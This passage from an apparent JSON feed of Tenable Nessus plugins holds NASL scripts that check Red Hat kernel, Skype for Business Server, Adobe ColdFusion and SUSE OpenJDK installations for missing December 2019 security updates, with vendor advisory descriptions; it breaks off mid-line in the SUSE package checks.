audit(AUDIT_OS_NOT, \"Red Hat 7.6\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2019-9500\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2019:4168\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:4168\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"bpftool-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", reference:\"kernel-abi-whitelists-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", reference:\"kernel-doc-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"perf-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"perf-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"python-perf-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"6\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-957.41.1.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bpftool / kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-13T09:19:24", "bulletinFamily": "scanner", "description": "The Microsoft Skype for Business installation on the remote host is missing a security update. It is, therefore,\naffected by a spoofing vulnerability because the Skype for Business Server does not properly sanitize a specially\ncrafted request. An authenticated, remote attacker can exploit the vulnerability by sending a specially crafted request\nto an affected server. An attacker who successfully exploits this vulnerability can then perform cross-site scripting\nattacks on affected systems and run scripts in the security context of the current user. For the vulnerability to be\nexploited, a user must click a specially crafted URL that takes the user to a targeted Skype for Business site.", "modified": "2019-12-12T00:00:00", "published": "2019-12-12T00:00:00", "id": "SMB_NT_MS19_DEC_SKYPE.NASL", "href": "https://www.tenable.com/plugins/nessus/132020", "title": "Security Updates for Microsoft Skype for Business (December 2019)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132020);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/12/12\");\n\n script_cve_id(\"CVE-2019-1490\");\n script_xref(name:\"MSKB\", value:\"4534761\");\n script_xref(name:\"MSFT\", value:\"MS19-4534761\");\n script_xref(name:\"IAVA\", value:\"2019-A-0457\");\n\n script_name(english:\"Security Updates for Microsoft Skype for Business (December 2019)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Skype for Business installation on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Skype for Business installation on the remote host is missing a security update. It is, therefore,\naffected by a spoofing vulnerability because the Skype for Business Server does not properly sanitize a specially\ncrafted request. An authenticated, remote attacker can exploit the vulnerability by sending a specially crafted request\nto an affected server. An attacker who successfully exploits this vulnerability can then perform cross-site scripting\nattacks on affected systems and run scripts in the security context of the current user. For the vulnerability to be\nexploited, a user must click a specially crafted URL that takes the user to a targeted Skype for Business site.\");\n # https://support.microsoft.com/en-us/help/4534761/description-of-the-security-update-for-skype-for-business-server-2019\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f618bbd7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4534761 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1490\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:skype_for_business\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"office_installed.nasl\",\"microsoft_lync_server_installed.nasl\",\"smb_hotfixes.nasl\",\"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('install_func.inc');\n\nreport = '';\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\nget_kb_item_or_exit('SMB/Registry/Enumerated', exit_code:1);\n\nbulletin = 'MS19-12';\napp = 'Microsoft Lync';\ninstalls = get_installs(app_name:app);\nfix_ver = '7.0.2046.151';\nforeach install (installs[1])\n{\n version = install['version'];\n\n if (ver_compare(ver:version, minver:'7.0', fix:fix_ver, strict:FALSE) < 0 && 'Server' >< install['Product'])\n {\n app_label = 'Skype for Business Server 2019';\n report +=\n '\\n\\n Product : ' + app_label +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix_ver;\n }\n}\n\nif (empty(report))\n audit(AUDIT_HOST_NOT, 'affected');\n\nreplace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\nsecurity_report_v4(severity:SECURITY_WARNING, port:0, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-13T06:46:37", "bulletinFamily": "scanner", "description": "The version of Adobe ColdFusion installed on the remote Windows host is prior to 2018.x update 7. It is, therefore,\naffected by a vulnerability as referenced in the APSB19-58 advisory.\n\n - Insecure inherited permissions of default installation\n directory potentially leading to Privilege Escalation\n (CVE-2019-8256)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application", "modified": "2019-12-02T00:00:00", "published": "2019-12-12T00:00:00", "id": "COLDFUSION_WIN_APSB19-58.NASL", "href": "https://www.tenable.com/plugins/nessus/132019", "title": "Adobe ColdFusion < 2018.x < 2018u7 Vulnerability (APSB19-58)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132019);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/12/12\");\n\n script_cve_id(\"CVE-2019-8256\");\n script_xref(name:\"IAVA\", value:\"2019-A-0347\");\n\n script_name(english:\"Adobe ColdFusion < 2018.x < 2018u7 Vulnerability (APSB19-58)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web-based application running on the remote host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe ColdFusion installed on the remote Windows host is prior to 2018.x update 7. It is, therefore,\naffected by a vulnerability as referenced in the APSB19-58 advisory.\n\n - Insecure inherited permissions of default installation\n directory potentially leading to Privilege Escalation\n (CVE-2019-8256)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/coldfusion/apsb19-58.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Adobe ColdFusion version 2018 update 7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8256\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:coldfusion\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"coldfusion_win_local_detect.nasl\");\n script_require_keys(\"SMB/coldfusion/instance\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('coldfusion_win.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\ninstances = get_coldfusion_instances(); # this exits if it fails\n\n# Check the hotfixes and cumulative hotfixes\n# installed for each instance of ColdFusion.\ninstance_info = make_list();\n\nforeach name (keys(instances))\n{\n info = NULL;\n ver = instances[name];\n\nif (ver == '2018.0.0')\n {\n info = check_jar_chf(name, 7);\n }\n if (!isnull(info))\n instance_info = make_list(instance_info, info);\n}\n\nif (max_index(instance_info) == 0)\n audit(AUDIT_INST_VER_NOT_VULN, 'Adobe ColdFusion');\n\nport = get_kb_item('SMB/transport');\nif (!port)\n port = 445;\n\nreport =\n '\\n' + 'Nessus detected the following unpatched instances :' +\n '\\n' + join(instance_info, sep:'\\n') +\n '\\n';\n\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-13T09:43:22", "bulletinFamily": "scanner", "description": "This update for java-1_8_0-openjdk (jdk8u232/icedtea 3.14.0) fixes the\nfollowing issues :\n\nSecurity issues fixed (bsc#1154212) :\n\nCVE-2019-2933: Windows file handling redux\n\nCVE-2019-2945: Better socket support\n\nCVE-2019-2949: Better Kerberos ccache handling\n\nCVE-2019-2958: Build Better Processes\n\nCVE-2019-2964: Better support for patterns\n\nCVE-2019-2962: Better Glyph Images\n\nCVE-2019-2973: Better pattern compilation\n\nCVE-2019-2975: Unexpected exception in jjs\n\nCVE-2019-2978: Improved handling of jar files\n\nCVE-2019-2981: Better Path supports\n\nCVE-2019-2983: Better serial attributes\n\nCVE-2019-2987: Better rendering of native glyphs\n\nCVE-2019-2988: Better Graphics2D drawing\n\nCVE-2019-2989: Improve TLS connection support\n\nCVE-2019-2992: Enhance font glyph mapping\n\nCVE-2019-2999: Commentary on Javadoc comments\n\nCVE-2019-2894: Enhance ECDSA operations (bsc#1152856)\n\nBug fixes: Fixed build failuers on ARM (bsc#1138529).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "published": "2019-12-12T00:00:00", "id": "SUSE_SU-2019-3238-1.NASL", "href": "https://www.tenable.com/plugins/nessus/132004", "title": "SUSE SLED15 / SLES15 Security Update : java-1_8_0-openjdk (SUSE-SU-2019:3238-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:3238-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(132004);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/12/12\");\n\n script_cve_id(\"CVE-2019-2894\", \"CVE-2019-2933\", \"CVE-2019-2945\", \"CVE-2019-2949\", \"CVE-2019-2958\", \"CVE-2019-2962\", \"CVE-2019-2964\", \"CVE-2019-2973\", \"CVE-2019-2975\", \"CVE-2019-2978\", \"CVE-2019-2981\", \"CVE-2019-2983\", \"CVE-2019-2987\", \"CVE-2019-2988\", \"CVE-2019-2989\", \"CVE-2019-2992\", \"CVE-2019-2999\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : java-1_8_0-openjdk (SUSE-SU-2019:3238-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for java-1_8_0-openjdk (jdk8u232/icedtea 3.14.0) fixes the\nfollowing issues :\n\nSecurity issues fixed (bsc#1154212) :\n\nCVE-2019-2933: Windows file handling redux\n\nCVE-2019-2945: Better socket support\n\nCVE-2019-2949: Better Kerberos ccache handling\n\nCVE-2019-2958: Build Better Processes\n\nCVE-2019-2964: Better support for patterns\n\nCVE-2019-2962: Better Glyph Images\n\nCVE-2019-2973: Better pattern compilation\n\nCVE-2019-2975: Unexpected exception in jjs\n\nCVE-2019-2978: Improved handling of jar files\n\nCVE-2019-2981: Better Path supports\n\nCVE-2019-2983: Better serial attributes\n\nCVE-2019-2987: Better rendering of native glyphs\n\nCVE-2019-2988: Better Graphics2D drawing\n\nCVE-2019-2989: Improve TLS connection support\n\nCVE-2019-2992: Enhance font glyph mapping\n\nCVE-2019-2999: Commentary on Javadoc comments\n\nCVE-2019-2894: Enhance ECDSA operations (bsc#1152856)\n\nBug fixes: Fixed build failuers on ARM (bsc#1138529).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1138529\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1152856\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1154212\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2894/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2933/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2945/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2949/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2958/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2962/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2964/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2973/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2975/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2978/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2981/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2983/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2987/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2988/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2989/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2992/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-2999/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20193238-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?44ec3e6c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Packagehub Subpackages 15:zypper in\n-t patch SUSE-SLE-Module-Packagehub-Subpackages-15-2019-3238=1\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15-SP1:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-SP1-2019-3238=1\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-3238=1\n\nSUSE Linux Enterprise Module for Legacy Software 15-SP1:zypper in -t\npatch SUSE-SLE-Module-Legacy-15-SP1-2019-3238=1\n\nSUSE Linux Enterprise Module for Legacy Software 15:zypper in -t patch\nSUSE-SLE-Module-Legacy-15-2019-3238=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-accessibility\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-demo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-headless-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:java-1_8_0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-accessibility-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-debugsource-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-src-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-debugsource-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-demo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-demo-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-devel-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-devel-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-headless-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"java-1_8_0-openjdk-headless-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-accessibility-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-debugsource-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-src-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-debuginfo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-debugsource-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"java-1_8_0-openjdk-demo-1.8.0.232-3.27.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", 